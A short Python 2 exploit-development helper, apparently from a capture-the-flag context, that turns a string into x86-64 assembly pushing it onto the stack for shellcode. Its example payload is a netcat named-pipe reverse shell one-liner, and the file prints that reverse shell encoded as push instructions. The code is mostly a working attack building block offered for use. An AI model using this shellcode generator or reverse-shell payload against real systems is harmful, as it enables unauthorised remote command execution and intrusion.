return asm shellcode : push string into stack and esp points to it!

shellcode-pushstr.py

#!/usr/bin/python
# date: 2018-12-11
# author: thinkycx
# description: return asm shellcode : push string into stack and esp points to it!
# usage:
#       change payload and run it.
import math
def pushstr(string='/home/orw/flag',length=8):
    '''
    return asm shellcode : push string into stack and esp points to it!
    '''
    print 'pushasm: '+string
    string = string[::-1]
    pushstr = ''
    times = int(math.ceil(float(len(string))/length))
    startpos = 0
    for i in range(1,times+1):
        ilen = (len(string) - (times-i)*length)
        ilen = ilen if ilen < length else length
        istring = string[startpos:startpos+ilen].encode('hex')
        pushstr += 'mov rcx, 0x%s\npush rcx\n' % istring
        #pushstr += 'push 0x%s;' % istring
        # print 'start '+str(startpos)+' end '+str(startpos+ilen)
        startpos += ilen
    print pushstr
    # log.info("/home/orw/flag\x00".encode('hex'))
    return pushstr

payload = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 7777 > /tmp/f'
pushstr(payload)

'''
Output: 
pushasm: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 7777 > /tmp/f
mov rcx, 0x662f706d74
push rcx
mov rcx, 0x2f203e2037373737
push rcx
mov rcx, 0x20312e302e302e37
push rcx
mov rcx, 0x323120636e7c3126
push rcx
mov rcx, 0x3e3220692d206873
push rcx
mov rcx, 0x2f6e69622f7c662f
push rcx
mov rcx, 0x706d742f20746163
push rcx
mov rcx, 0x3b662f706d742f20
push rcx
mov rcx, 0x6f6669666b6d3b66
push rcx
mov rcx, 0x2f706d742f206d72
push rcx
'''